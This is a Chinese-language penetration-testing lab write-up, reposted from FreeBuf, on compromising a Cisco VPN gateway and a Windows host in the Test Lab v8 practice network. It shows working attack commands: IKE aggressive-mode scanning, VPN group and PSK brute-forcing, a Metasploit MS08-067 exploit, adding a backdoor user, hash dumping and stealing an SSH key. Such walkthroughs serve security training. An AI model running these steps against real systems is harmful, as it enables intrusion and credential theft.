记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

TEST LAB V8(二):Cisco设备和Terminal系统

2016-04-21 18:10

这是test lab v8报告的第二部分,在第一部分中我们通过网关192.168.101.6攻破了两个系统网站和Cabinet。在这一部分,我们将看到如何通过网关192.168.101.7找到Cisco设备和Terminal系统的token。

032016_1259_TestLabV8Pa1.png

攻击CISCO:

我们用nmap扫描网关,使用下面的命令:

nmap -sS -sV -Pn -p1-65535 192.168.101.7

032016_1259_TestLabV8Pa2.jpg

Nmap找到了两个开放的端口,SSH和HTTP,我们使用浏览器访问IP和8100端口,加载了一个e-mail应用程序。我们在攻击Site和Cabinet系统时找到了一个有效的登录凭证,Ralph Westfall的账户。我们尝试使用该凭证(RalphWestfall@sas bank.lab / freeman)登录,发现成功登录了。

032016_1259_TestLabV8Pa3.jpg

登录之后,我们查看所有的邮件,发现了一个感兴趣的东西:VPN密码。

032016_1259_TestLabV8Pa4.jpg

如果我们看一下网络拓扑图,就会发现那里有一个网络设备Cisco路由器。现在我们尝试访问VPN网络,为了达到这个目的,我么需要两个工具IKEforce和IKEscan。使用下面的命令执行IKEscan。

sudo ike-scan -M –id=test -A 192.168.101.7

在命令中,-M表示输出可读信息,—A表示主动模式,-id是一个运行此工具必须的随机的组名。

032016_1259_TestLabV8Pa5.jpg

从上面的截屏中我们可以得到下列信息:

    Enc=3DES

    Hash=SHA1

    Group=2:modp1024

    Auth=psk

现在,我们用IKEforce来枚举出有效的VPN组名。我们将使用IKEforce的默认字典暴力猜解组名,命令如下:

 sudo ./ikeforce.py 192.168.101.7 -e -w -wordlists/groupnames.dic -t 5 2 1 2

在命令中,-t参数指定加密类型、hash类型,组以及认证方法,这些我们用IKEscan已经获取了。在该工具的帮助文档中有一个表,如下:

032016_1259_TestLabV8Pa6.jpg

在运行完这个工具后,我们发下了正确的组id,就是:vpn。

032016_1259_TestLabV8Pa7.jpg

现在,我们有了正确的组id,我们再次运行ike-scan工具,抓取PSK握手消息,使用下面的命令:

sudo ike-scan -M –id=vpn -A 192.168.101.7 -Pcapture.psk

032016_1259_TestLabV8Pa8.jpg

在运行完之后,我们得到了一个capture.psk文件。

032016_1259_TestLabV8Pa9.jpg

现在我们将尝试暴力破解psk文件。在IKEscan工具包中有一个psk-crack工具。我们使用下面的命令来暴力破解。

psk-crak -d /usr/share/wordlists/rockyou.txt capture.psk

032016_1259_TestLabV8Pa10.jpg

如上图所示,我们发现了正确的key,它就是:cicsc123。

现在我们有了连接VPN相关的资料,我们掌握了下面的信息:

    Gateway IP – 192.168.101.7

    IPSec ID – vpn

    IPSec secret -cisco123

    Username – westfall

    Password – AiWa8ahk

我们尝试使用vpnc连接,如下图所示,成功连上了Cisco设备。

032016_1259_TestLabV8Pa11.jpg

为了确认是否可以连接互联网,我们ping谷歌,ping不通。但是当尝试ping谷歌的IP时得到了响应。

032016_1259_TestLabV8Pa12.jpg

这好像是DNS解析的问题,因此打开了/etc/resolv.conf来寻找问题,我们在那儿找到了Token。

032016_1259_TestLabV8Pa13.jpg

攻击TERMINAL:

我们现在可以连上VPN了,所以可以攻击在另一个网络中的机器TERMINAL。在运行工具之前,我们需要确认自己已经连上了Cisco VPN,使用nmap进行端口扫描,命令如下:

nmap -sS -sV -Pn -A 192.168.0.2

032016_1259_TestLabV8Pa14.jpg

通过查看端口,这个系统好像有著名的netapi漏洞。445端口开放,运行着samba服务,这很容易被远程攻击。我们在Metasploit上执行下面命令:

   use exploit/windows/smb/ms08_067_netapi

    set payload windows/meterpreter/bind_tcp

    set RHOST 192.168.0.2

    exploit

032016_1259_TestLabV8Pa15.jpg

漏洞利用很顺利,现在我们有了一个meterpreter会话。我们使用一个post漏洞利用模块,它会在系统上增加一个用户,命令如下:

run getgui -u test -p test

032016_1259_TestLabV8Pa16.jpg

现在我们可以使用test/test登录Terminal系统了。

032016_1259_TestLabV8Pa17.jpg

一旦我们登录进系统,就要开始寻找token文件了,Start->Administrative Tools->Computer Management,单击 Local Users and Groups->Users,在westfall的账号描述中找到了token。

032016_1259_TestLabV8Pa18.jpg

我们的工作到现在还没有终止,无论什么时候攻破了什么系统,要浏览整个系统,寻找能帮我们攻下网络中其它系统的文件和信息。正如下面看到的,系统中有很多的用户,或许其中的一些用户可以用来登录其它系统,所以我们使用meterprter获取所有用户的hash,命令为:

run hashdump

032016_1259_TestLabV8Pa19.jpg

把所有的hash拷贝到一个text文件中,然后使用Ophcrack工具破解,我们使用XP fast和XP small表,下面是hash的破解结果:

032016_1259_TestLabV8Pa20.jpg

我们在westfall的桌面上找到了一个ppk文件,是由Putty生成的。

032016_1259_TestLabV8Pa21.jpg

把ppk文件拷贝到我们的本地系统。现在我们需要把ppk文件转换为OpenSSH的格式,为此需要使用Puttygen工具,打开该工具然后点击load。

032016_1259_TestLabV8Pa22.jpg

选择ppk文件,然后选择Conversions>Export OpenSSH key

032016_1259_TestLabV8Pa23.jpg

在输出信息中,我们能够得到SSH的私钥。

032016_1259_TestLabV8Pa24.jpg

现在,终于完成了对Terminal系统的攻击。

参考文献:

    http://opensourceforu.efytimes.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/

    https://github.com/royhills/ike-scan

    https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/

    https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-2)/

    https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part3)/

原文:infosec FB小编felix编译,转载请注明来自FreeBuf.com

知识来源: www.freebuf.com/articles/system/102237.html

阅读:145737 | 评论:0 | 标签:系统安全 网络安全 Test Lab 内网渗透

想收藏或者和大家分享这篇好文章→复制链接地址

“TEST LAB V8(二):Cisco设备和Terminal系统”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云